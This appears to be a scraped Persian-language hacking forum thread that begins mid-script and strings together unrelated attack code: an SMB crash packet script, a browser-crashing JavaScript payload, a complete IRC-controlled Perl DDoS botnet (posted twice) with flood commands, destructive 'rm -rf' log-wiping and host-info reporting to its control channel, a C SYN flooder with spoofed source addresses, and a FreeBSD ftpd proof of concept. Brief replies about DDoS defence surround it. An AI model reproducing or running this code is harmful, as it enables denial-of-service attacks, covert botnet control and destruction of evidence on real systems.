sys.exit('python smbd.py 10.0.0.12')

host = sys.argv[1],445

packetnego=(
"\x00\x00\x00\x85"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x 00\x00\x00\x00"
"\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x 52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x 4c\x41\x4e\x4d"
"\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x 77\x73\x20\x66"
"\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x 73\x20\x33\x2e"
"\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x 32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x 20\x4c\x4d\x20"
"\x30\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x00\xec"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x 00\x00\x40\x00"
"\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x 00\x00\x00"
"\xff\xff" ## Security blob set to \xff\xff here
"\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x 06\x06\x2b"
"\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x 0c\x06\x0a\x2b"
"\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x 28\x4e\x54\x4c"
"\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\x a2\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x05\x01\x28"
"\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x 64\x00\x6f\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x 32\x00\x20\x00"
"\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x 65\x00\x20\x00"
"\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x 20\x00\x32\x00"
"\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x 6e\x00\x64\x00"
"\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x 30\x00\x32\x00"
"\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"
)
s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(payload))

Firefox 3.6.3 & Safari 4.0.5 - Access Violation Exception and Unknown Exception

**********
var a=String.fromCharCode(60,115,99,114,105,112,116,62 ,118,97,114,32,97,61,34,60,109,97,114,113,117,101, 101,62,97,34,59,119,104,105,108,101,40,49,41,123,9 7,61,97,43,97,59,100,111,99,117,109,101,110,116,46 ,119,114,105,116,101,40,97,41,59,125,60,47,115,99, 114,105,112,116,62);
while(1){
a=a+a;
document.write(a);
}
</script>


//var a=<script>var a="<marquee>a";while(1){a=a+a;document.write(a);}</script>

اینم یه مقاله دیگه به زبان شیرین فارسی !

از اساتید اگر کسی برنامه Command Line Base ای (مانند netcat ) را سراغ داره که بتونه پکت های با مشخصات درخواستی ما رو بسازه ممنون میشم معرفی کنه .heart
در لینوکس برنامه packeth ودر ویندوز برنامه Colasoft Packet Builder این کار رادر GUI انجام می دهند ولی کامل نیستند .
ضمنا چون جهت تست حمله DOS می باشد این سوال را این جا مطرح کردم ..

[Only registered and activated users can see links]
[Only registered and activated users can see links]

سلام
استاد ما یه سوال داده گفته اگه اینو جواب بدید 20 میدم و دیگه نمیخواد امتحان بدید
پرسیده که : چجوری میشه با حملات DDOs روی یک سرور مقابله کرد جوری که حداکثر تعداد کاربرا بتونن سایتها رو ببینن
البته روشی غیر از استفاده از فایروال
لطفا راهنمایی کنید
ممنون

من دو راه رو پیشنهاد می کنم؛
1. روشی که در این تاپیک گفته شده:
[Only registered and activated users can see links]
2. یک اسکریپت بنویسید که اینکارو کنه؛ این که اسکریپت دقیقا چیکار کنه رو باید دیگه شبکه بلد باشید ...
در این مورد هم از یکی از دوستان سوال کردم که مورد دوم رو ایشون گفت؛ سایتی بوده که با 40 - 50 تا سرور میزدن، اما با این اسکریپت همشون ...

#!/usr/bin/perl -w
use IO::Socket::INET;
use [Only registered and activated users can see links]
use LWP::UserAgent;
use LWP::Simple;
use URI::Escape;

print q{
-------------------------------
_____
_____ _____/ ____\____
/ \ / _ \ __\/ _ \
| Y Y ( <_> ) | ( <_> )
|__|_| /\____/|__| \____/
\/
-------------------------------
\\ m0f0 ddos priv8 by t0fx //
\\ credits to pitbull bot //
\\ europasecurity.org //
\\ spam.ws //
\\------------------//

};
#= CONFIGURATION =========================================#
my $server = "romania.indoirc.net"; #
my $nick = "[m0f0][" . int( rand(9999) ) . "]"; #
my $port = "6667"; #
my $channel = "#wreck"; #
#= END OF CONFIGURATION ==================================#

my $name = "mofo 8 * : mofo";
print "\n";
print "\n [+] Connecting to $server\n";
$connection = IO::Socket::INET->new(PeerAddr=>"$server",
PeerPort=>"$port",
Proto=>'tcp',
Timeout=>'30') or die " [-] Couldnt connect to $server\n";
print " [+] Connected to $server\n\n";
print $connection "USER $name\n";
print $connection "NICK $nick\r\n";

while($response = <$connection>)

{

print $response; #print IRC Response
if($response =~ m/:(.*) 00(.*) (.*) :/){print $connection "JOIN ".$channel."\r\n";}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!help/){&help;}
if($response =~ m/^PING (.*?)$/gi){print $connection "PONG ".$1."\r\n";}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!die/){&diebastard;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!logcleaner/){&logcleaner;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!infos/){&infos;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
print $connection "PRIVMSG $channel :6|6.:12UDP DDos6:.6|12 Attacking 6 ".$3." 12 with 6 ".$4." 12 packets during 6 ".$5." 12 seconds.\r\n";
my ($dtime, %­packets) = udpflooder("$3", "$4", "$5");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $4 * $packets{igmp};
$bytes{icmp} = $4 * $packets{icmp};
$bytes{o} = $4 * $packets{o};
$bytes{udp} = $4 * $packets{udp};
$bytes{tcp} = $4 * $packets{tcp};
print $connection "PRIVMSG $channel :6|6.:12UDP DDos6:.6|12 Results6 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12KB in6 ".$dtime." 12seconds 6 ".$3.".\r\n";
}

if($response =~ m/:(.*)!(.*) PRIVMSG $channel :\s+(\d+)/) {
print $connection "PRIVMSG $channel :6|6.:6HTTP DDos6:.6|12 Attacking 6 ".$3." 12 on port 80 during6 ".$4." 12 seconds .\r\n";
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($4>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$3, PeerPort=>80);
print $socket "GET / [Only registered and activated users can see links] */*\r\nHost: ".$3." \r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
print $connection "PRIVMSG $channel :6|6.:6HTTP DDos6:.6|12 Attack finished 6 ".$3.".\r\n";
}

if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
print $connection "PRIVMSG $channel :6|6.:11TCP DDos6:.6|12 Attacking 6 ".$3.":".$4." 12during 6 ".$5." 12seconds.\r\n";
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($5>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$3","$4","$5");
}
print $connection "PRIVMSG $channel :6|6.:11TCP DDos6:.6| 12Attack finished 6 ".$3.":".$4.".\r\n";
}

}

################################################## ##############################​############
sub diebastard
{
print $connection "PRIVMSG $channel :8,1 Quitting... \r\n";
exec("pkill perl [Only registered and activated users can see links] \n");
}
################################################## ##############################​############
sub help
{
my $asker = $1;
print $connection "PRIVMSG $channel :6$asker 11[!] Help :\r\n";
print $connection "PRIVMSG $channel :6|6.:12HTTP DDos6:.6| 11![Only registered and activated users can see links] <IP> <duration>\r\n";
print $connection "PRIVMSG $channel :6|6.:12UDP DDos6:.6| 11!udpflood <IP> <Packet size> <duration>\r\n";
print $connection "PRIVMSG $channel :6|6.:12TCP DDos6:.6| 11!tcpflood <IP> <Port> <duration>\r\n";
print $connection "PRIVMSG $channel :6|6.:12Log Cleaner6:.6| 11!logcleaner\r\n";
print $connection "PRIVMSG $channel :6|6.:12Infos6:.6| 11!infos\r\n";

}
################################################## ##############################​############
sub logcleaner
{
my $asker = $1;
print $connection "PRIVMSG $channel :6$asker 11[!] Cleaning started\r\n";
system 'rm -rf /var/log/lastlog';
system 'rm -rf /var/log/wtmp';
system 'rm -rf /etc/wtmp';
system 'rm -rf /var/run/utmp';
system 'rm -rf /etc/utmp';
system 'rm -rf /var/log';
system 'rm -rf /var/logs';
system 'rm -rf /var/adm';
system 'rm -rf /var/apache/log';
system 'rm -rf /var/apache/logs';
system 'rm -rf /usr/local/apache/log';
system 'rm -rf /usr/local/apache/logs';
system 'rm -rf /root/.bash_history';
system 'rm -rf /root/.ksh_history';
print $connection "PRIVMSG $channel :6$asker 11[!] File Log bash_history Cleaned\r\n";
sleep 1;
print $connection "PRIVMSG $channel :6$asker 11[!] Cleaning files\r\n";
system 'find / -name *.bash_history -exec rm -rf {} \;';
system 'find / -name *.bash_logout -exec rm -rf {} \;';
system 'find / -name "log*" -exec rm -rf {} \;';
system 'find / -name *.log -exec rm -rf {} \;';
sleep 1;
print $connection "PRIVMSG $channel :6$asker 11[!] Cleaning Successfull\r\n";

}

################################################## ##############################​############
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%­packets);
$packets{icmp} = $packets{igmp} = $packets{udp} = $packets{o} = $packets{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $fport = 1;
$fport <= 65000; $fport++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($fport, $iaddr)) and $packets{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($fport, $iaddr)) and $packets{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($fport, $iaddr)) and $packets{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($fport, $iaddr)) and $packets{tcp}++;


for (my $pc = 3;
$pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($fport, $iaddr)) and $packets{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %­packets);
}
################################################## ##############################​############
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
################################################## ##############################​############

################################################## ##############################​############
sub infos
{
my $uname=`uname -a`;
my $uptime=`uptime`;
my $ownd=`pwd`;
my $distro=`cat /etc/issue`;
my $id=`id`;
my $un=`uname -sro`;
my $asker = $1;
print $connection "PRIVMSG $channel :6$asker 5[!] System infos :\r\n";
print $connection "PRIVMSG $channel :6|6.:12Bot Info6:.6| 12Bot version : 11 m0f0 v1 by t0fx\r\n";
print $connection "PRIVMSG $channel :6|6.:12System Info6:.6| 12Uname -a : 11 $uname\r\n";
print $connection "PRIVMSG $channel :6|6.:12System Info6:.6| 12Uptime : 11 $uptime\r\n";
print $connection "PRIVMSG $channel :6|6.:12System Info6:.6| 12ID : 11 $id\r\n";
print $connection "PRIVMSG $channel :6|6.:12System Info6:.6| 12Directory : 11 $ownd\r\n"; ;
print $connection "PRIVMSG $channel :6|6.:12System Info6:.6| 12OS : 11 $distro\r\n";

}
################################################## ##############################​############

حالا همه برای ما ملای نقطه گیر شدند :ii

این تاپیک:
[Only registered and activated users can see links]

سلام
باید بتونید Ip هارو شناسایی کنین و اینکه چقدر پهنای باندتون توسط اون Ip ها داره مصرف میشه، اگر از یک حد زیادتر شد خیلی راحت او ip رو بن کنید! ;;)
البته باید کد نویسیتون خیلی قوی باشه چون هرچقدر Ip ها زیاد باشه (برای مثال دوستمون گفتن با 40 - 50 تا سرور) کار شما سخت تره !
موفق باشید heart

سلام عزیز به این استاد بگو حملات Ddos رو با فایروال نمی شه جلوشو گرفت حالا با چی جلوشو بگیری برای این نوع حملات تضمین 100 در 100 وجود نداره!
بعد سوال ناقصه ؟!
سرور چی هست؟
چون سوالش حرفه ایی و جواب هم زیاد داره !
مثلا یه کدی بنویسی که اگر connection ها بالایه 20 رفت ban بشه (که بازم کارش botnet )
تو هم ین آشیانه هم کدش هست !
[Only registered and activated users can see links]
یا اگر Lin هست سرور با iptables کارایه جالبی می شه کرد !
بعد یه سوالم ازش بکن بپرس در مورده Botnet چیزی می دونه یا نه؟
راستی با cms هم جلوشو گرفت که بازم نیازمند برنامه نویسی هست با php می شه این کارو کرد !

#= CONFIGURATION =========================================#
my $server = "romania.indoirc.net"; #
my $nick = "[m0f0][" . int( rand(9999) ) . "]"; #
my $port = "6667"; #
my $channel = "#wreck"; #
#= END OF CONFIGURATION ==================================#


دوست عزیز بیشتر به یک BotNeT شبیه تا DDoS :cool:

خوب botnet هم کارش Ddos به چیز ها زیاد گیر ندیم بهتره!;)

لطفا فایل رو ضمیمه کنید اینطوری توی سایت مورد داره اینگار cigar

لطفا فایل رو ضمیمه کنید اینطوری توی سایت مورد داره اینگار cigar

ضميمه شد .

بازم يه سري كاراكتر ها نافرمه .
لطفا بررسي كنيد

بازم يه سري كاراكتر ها نافرمه .
لطفا بررسي كنيد


فكر نكنم مشكلي داشته باشه . تست نكردم . ولي تو سرچي كه كردم غيره اين نبود .
#!/usr/bin/perl -w
use IO::Socket::INET;
use [Only registered and activated users can see links]
use LWP::UserAgent;
use LWP::Simple;
use URI::Escape;

print q{
-------------------------------
_____
_____ _____/ ____\____
/ \ / _ \ __\/ _ \
| Y Y ( <_> ) | ( <_> )
|__|_| /\____/|__| \____/
\/
-------------------------------
\\ m0f0 ddos priv8 by t0fx //
\\ credits to pitbull bot //
\\ europasecurity.org //
\\ spam.ws //
\\------------------//

};
#= CONFIGURATION =========================================#
my $server = "romania.indoirc.net"; #
my $nick = "[m0f0][" . int( rand(9999) ) . "]"; #
my $port = "6667"; #
my $channel = "#wreck"; #
#= END OF CONFIGURATION ==================================#

my $name = "mofo 8 * : mofo";
print "\n";
print "\n [+] Connecting to $server\n";
$connection = IO::Socket::INET->new(PeerAddr=>"$server",
PeerPort=>"$port",
Proto=>'tcp',
Timeout=>'30') or die " [-] Couldnt connect to $server\n";
print " [+] Connected to $server\n\n";
print $connection "USER $name\n";
print $connection "NICK $nick\r\n";

while($response = <$connection>)

{

print $response; #print IRC Response
if($response =~ m/:(.*) 00(.*) (.*) :/){print $connection "JOIN ".$channel."\r\n";}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!help/){&help;}
if($response =~ m/^PING (.*?)$/gi){print $connection "PONG ".$1."\r\n";}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!die/){&diebastard;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!logcleaner/){&logcleaner;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!infos/){&infos;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
print $connection "PRIVMSG $channel :6|6.:12UDP DDos6:.6|12 Attacking 6 ".$3." 12 with 6 ".$4." 12 packets during 6 ".$5." 12 seconds.\r\n";
my ($dtime, %packets) = udpflooder("$3", "$4", "$5");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $4 * $packets{igmp};
$bytes{icmp} = $4 * $packets{icmp};
$bytes{o} = $4 * $packets{o};
$bytes{udp} = $4 * $packets{udp};
$bytes{tcp} = $4 * $packets{tcp};
print $connection "PRIVMSG $channel :6|6.:12UDP DDos6:.6|12 Results6 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12KB in6 ".$dtime." 12seconds 6 ".$3.".\r\n";
}

if($response =~ m/:(.*)!(.*) PRIVMSG $channel :\s+(\d+)/) {
print $connection "PRIVMSG $channel :6|6.:6HTTP DDos6:.6|12 Attacking 6 ".$3." 12 on port 80 during6 ".$4." 12 seconds .\r\n";
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($4>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$3, PeerPort=>80);
print $socket "GET / [Only registered and activated users can see links] */*\r\nHost: ".$3." \r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
print $connection "PRIVMSG $channel :6|6.:6HTTP DDos6:.6|12 Attack finished 6 ".$3.".\r\n";
}

if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
print $connection "PRIVMSG $channel :6|6.:11TCP DDos6:.6|12 Attacking 6 ".$3.":".$4." 12during 6 ".$5." 12seconds.\r\n";
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($5>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$3","$4","$5");
}
print $connection "PRIVMSG $channel :6|6.:11TCP DDos6:.6| 12Attack finished 6 ".$3.":".$4.".\r\n";
}

}

################################################## ##############################​############
sub diebastard
{
print $connection "PRIVMSG $channel :8,1 Quitting... \r\n";
exec("pkill perl [Only registered and activated users can see links] \n");
}
################################################## ##############################​############
sub help
{
my $asker = $1;
print $connection "PRIVMSG $channel :6$asker 11[!] Help :\r\n";
print $connection "PRIVMSG $channel :6|6.:12HTTP DDos6:.6| 11![Only registered and activated users can see links] <IP> <duration>\r\n";
print $connection "PRIVMSG $channel :6|6.:12UDP DDos6:.6| 11!udpflood <IP> <Packet size> <duration>\r\n";
print $connection "PRIVMSG $channel :6|6.:12TCP DDos6:.6| 11!tcpflood <IP> <Port> <duration>\r\n";
print $connection "PRIVMSG $channel :6|6.:12Log Cleaner6:.6| 11!logcleaner\r\n";
print $connection "PRIVMSG $channel :6|6.:12Infos6:.6| 11!infos\r\n";

}
################################################## ##############################​############
sub logcleaner
{
my $asker = $1;
print $connection "PRIVMSG $channel :6$asker 11[!] Cleaning started\r\n";
system 'rm -rf /var/log/lastlog';
system 'rm -rf /var/log/wtmp';
system 'rm -rf /etc/wtmp';
system 'rm -rf /var/run/utmp';
system 'rm -rf /etc/utmp';
system 'rm -rf /var/log';
system 'rm -rf /var/logs';
system 'rm -rf /var/adm';
system 'rm -rf /var/apache/log';
system 'rm -rf /var/apache/logs';
system 'rm -rf /usr/local/apache/log';
system 'rm -rf /usr/local/apache/logs';
system 'rm -rf /root/.bash_history';
system 'rm -rf /root/.ksh_history';
print $connection "PRIVMSG $channel :6$asker 11[!] File Log bash_history Cleaned\r\n";
sleep 1;
print $connection "PRIVMSG $channel :6$asker 11[!] Cleaning files\r\n";
system 'find / -name *.bash_history -exec rm -rf {} \;';
system 'find / -name *.bash_logout -exec rm -rf {} \;';
system 'find / -name "log*" -exec rm -rf {} \;';
system 'find / -name *.log -exec rm -rf {} \;';
sleep 1;
print $connection "PRIVMSG $channel :6$asker 11[!] Cleaning Successfull\r\n";

}

################################################## ##############################​############
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%packets);
$packets{icmp} = $packets{igmp} = $packets{udp} = $packets{o} = $packets{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $fport = 1;
$fport <= 65000; $fport++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($fport, $iaddr)) and $packets{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($fport, $iaddr)) and $packets{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($fport, $iaddr)) and $packets{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($fport, $iaddr)) and $packets{tcp}++;


for (my $pc = 3;
$pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($fport, $iaddr)) and $packets{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %packets);
}
################################################## ##############################​############
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
################################################## ##############################​############

################################################## ##############################​############
sub infos
{
my $uname=`uname -a`;
my $uptime=`uptime`;
my $ownd=`pwd`;
my $distro=`cat /etc/issue`;
my $id=`id`;
my $un=`uname -sro`;
my $asker = $1;
print $connection "PRIVMSG $channel :6$asker 5[!] System infos :\r\n";
print $connection "PRIVMSG $channel :6|6.:12Bot Info6:.6| 12Bot version : 11 m0f0 v1 by t0fx\r\n";
print $connection "PRIVMSG $channel :6|6.:12System Info6:.6| 12Uname -a : 11 $uname\r\n";
print $connection "PRIVMSG $channel :6|6.:12System Info6:.6| 12Uptime : 11 $uptime\r\n";
print $connection "PRIVMSG $channel :6|6.:12System Info6:.6| 12ID : 11 $id\r\n";
print $connection "PRIVMSG $channel :6|6.:12System Info6:.6| 12Directory : 11 $ownd\r\n"; ;
print $connection "PRIVMSG $channel :6|6.:12System Info6:.6| 12OS : 11 $distro\r\n";

}
################################################## ##############################​############

این که یه Bot net .... لطفاً عنوان رو درست کنlo1ad

/*
____________
[_ ______ _]
|| ||
||\;;;;/||
|| \;;/ ||
|| )( ||
|| /.'\ ||
||/ ' \||
_||;;;;;;||_
[____________]
_________ .___
/ _____/____ ____ __| _/_____ _____ ____
\_____ \\__ \ / \ / __ |/ \\__ \ / \
/ \/ __ \| | \/ /_/ | Y Y \/ __ \| | \
/_______ (____ /___| /\____ |__|_| (____ /___| /
\/ \/ \/ \/ \/ \/ \/

Sandman
Flux - A Multithreaded Syn Flooder
*/

#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>

void usage(); //print usage info.
void getUserPriv(); //get user privelage.
int getSrcPort(); //Random port generator func

const char credit[] = "made by th3 $^N|)M^N, gr33tz to all!!!";

/*packet struct defined here*/
struct packet {
unsigned short ihl:4;
unsigned short ver:4;
unsigned char tos;
unsigned short len;
unsigned short id;
unsigned short flag_offset;
unsigned char ttl;
unsigned char prot;
unsigned short ipsum;
unsigned long source;
unsigned long dest;
unsigned short sport;
unsigned short dport;
unsigned long seq;
unsigned long ack_seq;
unsigned char offset;
unsigned char flags;
unsigned short win;
unsigned short tcpsum;
unsigned short urgptr;
char option[8]; //lets make the packet look like a windows packet ;)
};

FILE *fp;

main(int argc, char * argv[]){
getUserPriv(); //check user priv

if (argc < 5){
usage(); //exit if argument failure
}
int tmp = 1;

int forks = atoi(argv[3]); //number of forks

/*forks defined here, depends on the number of threads user asked for.*/
for (tmp = 0; tmp < forks; tmp++) fork();

int a1,a2,a3,a4;
char a1s[20],a2s[20],a3s[20],a4s[20];

/*lets open da socket and define it be raw*/
int sockd = socket(PF_INET, SOCK_RAW, 6);

/*call HDRINCL and let the kernel know we do the talking :)*/
if (setsockopt (sockd, IPPROTO_IP, IP_HDRINCL, (char *)&tmp, sizeof (tmp)) < 0){
printf("Error in setting HDRINCL");
exit(0);
}

/*create packet struct */
struct packet synp;
bzero(&synp,sizeof(struct packet)); /*zero out the struct*/

/*init sin struct*/
struct sockaddr_in sin;

/*take host port and convert to unsigned short*/
unsigned short hport = atoi(argv[2]);
int packets = atoi(argv[4]); //number of packets

if (packets == 0) packets = -1; //if user wants infinite, set packets to -1

int counter = 0; //counter for the while loop.

printf("Syn Flooding: %­s at port: %­s\n", argv[1],argv[2]);

while(counter != packets){
/*lets add the stamps eh...*/
//Init Packet tcp/ip header fields
synp.ihl = 5;
synp.ver = 4;
synp.len = htons(sizeof(struct packet));
synp.flag_offset = 0;
synp.prot = 6;
synp.flags = 2;
synp.ttl = 225;
synp.offset = 112;
synp.win = htons(65535);

synp.dport = htons(hport); //destination port...

//set packet options.
synp.option[0] = 2;
synp.option[1] = 4;
synp.option[2] = 5;
synp.option[3] = 0xB4;
synp.option[4] = 1;
synp.option[5] = 1;
synp.option[6] = 4;
synp.option[7] = 2;

synp.tcpsum = 0; //zero the sum for now...

register int count = (sizeof(struct packet)-20) >> 1,sum;
register unsigned short *p = &synp.sport;

int srcp = getSrcPort(); //generate random port.

//Generate Random Ip for src
a1 = (int)((rand()%(255-10+1)) + 10);
a2 = (int)((rand()%(255-10+1)) + 10);
a3 = (int)((rand()%(255-10+1)) + 10);
a4 = (int)((rand()%(255-10+1)) + 10);

sprintf(a1s, "%d", a1);
sprintf(a2s, "%d", a2);
sprintf(a3s, "%d", a3);
sprintf(a4s, "%d", a4);

strcat(a1s,".");
strcat(a2s,".");
strcat(a3s,".");
strcat(a1s,a2s);
strcat(a1s,a3s);
strcat(a1s,a4s);
//

synp.sport = htons(srcp); //source port [RANDOMIZED]
synp.source = inet_addr (a1s); //our source address [RANDOMIZED]
synp.seq = random();
synp.ack_seq = random();

synp.id = htons(1+255*((random()%256)|0xFF)); //random id

synp.dest = inet_addr (argv[1]);

sin.sin_family = AF_INET; /*define internet domain*/
sin.sin_port = synp.dport; /*define dest port.*/
sin.sin_addr.s_addr = synp.dest; /*define host address*/

/*calc header checksum*/
sum = (synp.source >> 16) + (synp.source & 0xffff) + (synp.dest >> 16) +
(synp.dest & 0xffff) + 1536 + htons(count << 1);
while(count--) sum += *p++;
sum = (sum >> 16) + (sum & 0xffff);
synp.tcpsum = ~(sum += (sum >> 16));
//

/*Send da baby*/
if (sendto (sockd,&synp,sizeof(struct packet),0,(struct sockaddr *)&sin,sizeof(struct sockaddr_in)) < 0){
printf("Sendto error!");
exit(0);
}

counter = counter + 1;
}
}

/*usage func*/
void usage(){
printf("Usage:\n");
printf("./flux ip port threads amount_of_packets(0 = max)\n");
printf("./flux 111.222.333.444 80 3 500\n");
exit(0);
}

/*user priv func, just checking for root.*/
void getUserPriv(){
char command[80] = "whoami > priv";
char command2[80] = "rm priv";
char fname[30] = "priv";
char user[20];
system(command);

fp = fopen(fname, "r");
fscanf(fp, "%­s",&user);
fclose(fp);
system(command2);

if (strcmp(user,"root") == 1){
printf("Need root privelages to run...\n");
exit(0);
}
}
/*random port generator func. */
int getSrcPort(){
int port = (rand()%(60000-2000+1)) + 2000;
return port;
}

FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)



# FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)
# CVE-2010-1938
# FreeBSD-SA-10:05
# Credit: Maksymilian Arciemowicz and Adam Zabrocki
#
# [Only registered and activated users can see links]
# [Only registered and activated users can see links]
# [Only registered and activated users can see links]
#

PoC:
Connected to localhost.
Escape character is '^]'.
220 127.cx FTP server (Version 6.00LS) ready.
user cx
331 Password required for cx.
user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection closed by foreign host.

- --
Best Regards,
- ------------------------
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib)
<[Only registered and activated users can see links]>
sub 4096g/0889FA9A 2008-08-22

[Only registered and activated users can see links]
[Only registered and activated users can see links]

Adobe Photoshop CS4 Extended 11.0 ASL File Handling Remote BoF PoC

Title:
Adobe Photoshop CS4 Extended 11.0 ASL File Handling Remote Buffer Overflow PoC


